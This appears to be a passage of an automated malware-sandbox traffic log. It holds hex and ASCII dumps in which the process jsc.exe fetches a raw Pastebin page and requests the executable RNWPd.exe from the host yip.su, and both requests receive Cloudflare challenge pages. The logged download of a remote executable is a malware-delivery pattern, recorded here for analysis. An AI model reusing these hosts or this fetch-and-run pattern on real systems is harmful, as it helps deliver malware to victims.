                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:11:35 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:11:35 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 35 33 33 35 32 27 2c 63 52 61 79 3a 20 27 38 62 34 64 30 30 33 30 65 65 37 35 30 63 38 32 27 2c 63 48 61 73 68 3a 20 27 39 36 35 31 63 65 33 62 62 65 38 36 34 63 61 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 36 6b 35 79 39 78 48 6f 41 43 44 68 55 43 4c 4f 6b 73 66 4c 43 4c 69 52 33 6a 62 70 6b 53 5a 63 71 6e 53 55 4a 6b 52 6d 6f 79 49 2d 31 37 32 33 39 33 32 36 39 35 2d 30 2e 30 2e 31 2e 31 2d 34 31 33 37 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '53352',cRay: '8b4d0030ee750c82',cHash: '9651ce3bbe864ca',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=6k5y9xHoACDhUCLOksfLCLiR3jbpkSZcqnSUJkRmoyI-1723932695-0.0.1.1-4137",cFPWv: 'g',cTTim
                                    2024-08-17 22:11:35 UTC1369INData Raw: 4b 57 42 59 4b 67 49 30 54 77 45 4a 57 45 67 77 71 39 6e 70 72 72 41 68 37 4b 75 78 39 46 58 75 30 52 57 64 7a 45 33 65 70 54 39 72 4a 38 4b 67 33 56 72 56 6a 68 67 75 54 6f 4f 4b 7a 63 4b 67 71 49 79 51 62 46 6a 68 54 43 71 70 71 62 45 43 70 66 4d 50 42 45 33 34 5a 78 68 64 48 53 4d 59 73 4e 66 77 64 58 72 7a 4e 7a 57 62 47 4c 46 45 55 58 42 32 38 66 62 35 53 65 74 49 63 55 43 69 6f 56 66 2e 41 6b 67 70 4b 50 54 37 52 2e 57 65 45 6d 67 6c 31 54 78 71 77 76 5f 75 75 35 4a 68 53 52 74 73 44 5f 43 35 45 54 7a 5a 48 35 36 74 70 42 77 55 62 7a 43 50 71 31 59 5f 4a 30 34 73 4c 53 75 6b 5a 42 33 43 42 54 36 61 31 42 30 4c 39 50 6e 41 53 66 6f 44 53 58 35 68 6a 6e 49 38 53 70 31 4c 49 4b 66 53 78 31 71 67 59 74 6f 31 70 32 49 78 39 37 73 6e 68 43 58 6b 33 52 71
                                    Data Ascii: KWBYKgI0TwEJWEgwq9nprrAh7Kux9FXu0RWdzE3epT9rJ8Kg3VrVjhguToOKzcKgqIyQbFjhTCqpqbECpfMPBE34ZxhdHSMYsNfwdXrzNzWbGLFEUXB28fb5SetIcUCioVf.AkgpKPT7R.WeEmgl1Txqwv_uu5JhSRtsD_C5ETzZH56tpBwUbzCPq1Y_J04sLSukZB3CBT6a1B0L9PnASfoDSX5hjnI8Sp1LIKfSx1qgYto1p2Ix97snhCXk3Rq


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    74192.168.2.549801104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:11:40 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:11:40 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:11:40 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4d00510a114289-EWR
                                    2024-08-17 22:11:40 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:11:40 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:11:40 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:11:40 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:11:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    75192.168.2.549802188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:11:40 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:11:40 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:11:40 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:11:40 UTC685INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 44 6e 56 58 39 63 56 54 30 2b 35 67 6d 58 4c 4b 6c 63 34 54 2b 70 78 61 4d 41 32 4f 6e 47 45 4e 73 6c 52 49 68 6a 31 5a 37 6b 57 54 2f 6f 7a 4b 30 73 7a 32 4f 78 35 34 76 63 64 32 66 34 68 70 57 63 44 49 77 56 4e 75 46 79 33 5a 67 2b 49 55 6c 38 75 47 36 46 32 79 6b 79 41 77 59 64 4e 57 37 53 47 65 73 64 51 53 73 58 30 3d 24 36 70 71 57 42 71 6f 2b 46 36 56 6e 72 4c 53 68 6b 64 67 45 63 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: DnVX9cVT0+5gmXLKlc4T+pxaMA2OnGENslRIhj1Z7kWT/ozK0sz2Ox54vcd2f4hpWcDIwVNuFy3Zg+IUl8uG6F2ykyAwYdNW7SGesdQSsX0=$6pqWBqo+F6VnrLShkdgEcg==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:11:40 UTC768INData Raw: 33 64 65 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3de7<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:11:40 UTC1369INData Raw: 79 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 39 39 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 62 6f 64 79 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 36 39 33 66 66 3b 63 6f 6c 6f 72 3a 23 31 64 31 64 31 64 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76
                                    Data Ascii: y .lds-ring div{border-color:#999 transparent transparent}body .font-red{color:#b20f03}body .pow-button{background-color:#4693ff;color:#1d1d1d}body #challenge-success-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5v
                                    2024-08-17 22:11:40 UTC1369INData Raw: 2e 6e 6f 2d 6a 73 20 2e 63 68 61 6c 6c 65 6e 67 65 2d 72 75 6e 6e 69 6e 67 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 62 6f 64 79 2e 64 61 72 6b 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 2e 64 61 72 6b 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 39 39 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 2e 64 61 72 6b 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c
                                    Data Ascii: .no-js .challenge-running{display:none}body.dark{background-color:#222;color:#d9d9d9}body.dark a{color:#fff}body.dark a:hover{color:#ee730a;text-decoration:underline}body.dark .lds-ring div{border-color:#999 transparent transparent}body.dark .font-red{col
                                    2024-08-17 22:11:40 UTC1369INData Raw: 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 62 6f 64 79 2e 6c 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 33 31 33 31 33 31 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 7b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 2e 6c 69 67 68 74 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64
                                    Data Ascii: Mzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}body.light{background-color:transparent;color:#313131}body.light a{color:#0051c3}body.light a:hover{color:#ee730a;text-decoration:underline}body.light .lds-ring div{bord
                                    2024-08-17 22:11:40 UTC1369INData Raw: 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20
                                    Data Ascii: 4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}a{background-color:transparent;color:#0051c3;text-decoration:none;transition:color
                                    2024-08-17 22:11:40 UTC1369INData Raw: 45 75 4d 44 45 67 4d 54 45 75 4d 44 45 67 4d 43 41 77 49 44 45 74 4d 54 45 67 4d 54 45 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 6d 4d 31 4e 7a 52 68 49 69 42 6b 50 53 4a 4e 4d 54 63 75 4d 44 4d 34 49 44 45 34 4c 6a 59 78 4e 55 67 78 4e 43 34 34 4e 30 77 78 4e 43 34 31 4e 6a 4d 67 4f 53 34 31 61 44 49 75 4e 7a 67 7a 65 6d 30 74 4d 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f
                                    Data Ascii: EuMDEgMTEuMDEgMCAwIDEtMTEgMTEiLz48cGF0aCBmaWxsPSIjZmM1NzRhIiBkPSJNMTcuMDM4IDE4LjYxNUgxNC44N0wxNC41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zO
                                    2024-08-17 22:11:40 UTC1369INData Raw: 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 32 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 77 69 64 74 68 3a
                                    Data Ascii: 5rem;line-height:1.125rem;margin:0 auto;max-width:60rem;width:100%}.footer-inner{border-top:1px solid #d9d9d9;padding-bottom:1rem;padding-top:1rem}.clearfix:after{clear:both;content:"";display:table}.clearfix .column{float:left;padding-right:1.5rem;width:
                                    2024-08-17 22:11:40 UTC1369INData Raw: 72 61 73 74 3a 6e 6f 6e 65 29 7b 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 7d 2e 72 74 6c 20 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 34 32 70 78 7d 2e 72 74 6c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b
                                    Data Ascii: rast:none){.main-wrapper,body{display:block}}.rtl .heading-favicon{margin-left:.5rem;margin-right:0}.rtl #challenge-success-text{background-position:100%;padding-left:0;padding-right:42px}.rtl #challenge-error-text{background-position:100%;padding-left:0;
                                    2024-08-17 22:11:40 UTC1369INData Raw: 74 57 41 34 6d 49 74 6b 4c 4a 42 51 78 71 50 6d 31 7a 49 33 64 66 37 47 7a 33 63 75 36 30 47 35 63 5a 79 68 65 78 50 77 44 63 4c 35 4f 39 73 66 64 4a 48 52 33 62 6a 65 6a 4c 6a 37 6c 39 53 73 49 78 69 62 7a 71 4c 74 6e 50 54 38 36 64 72 6c 4a 64 6a 33 54 7a 4b 75 66 6e 32 38 46 35 63 39 48 31 48 45 6b 4a 68 77 73 4d 4b 67 44 71 49 31 42 44 37 6b 49 35 6c 76 5a 76 45 32 64 73 68 6c 39 4e 33 69 39 77 37 6c 2e 6a 38 4d 4c 2e 53 66 44 79 4a 5a 53 6f 6b 67 4f 51 58 49 50 70 50 6f 2e 76 74 43 4c 55 44 79 78 6a 7a 49 44 57 4f 6d 74 35 41 6d 56 50 71 37 4c 73 66 31 72 62 31 53 53 42 53 4c 69 77 4e 6e 66 58 79 4b 4e 44 50 75 6c 69 37 44 59 6f 4b 42 79 6e 31 39 4b 4b 32 57 35 46 75 34 30 4d 48 5a 4e 6b 47 51 74 4c 7a 42 57 4c 59 4c 51 42 34 6e 73 5a 4f 59 6d 70 54
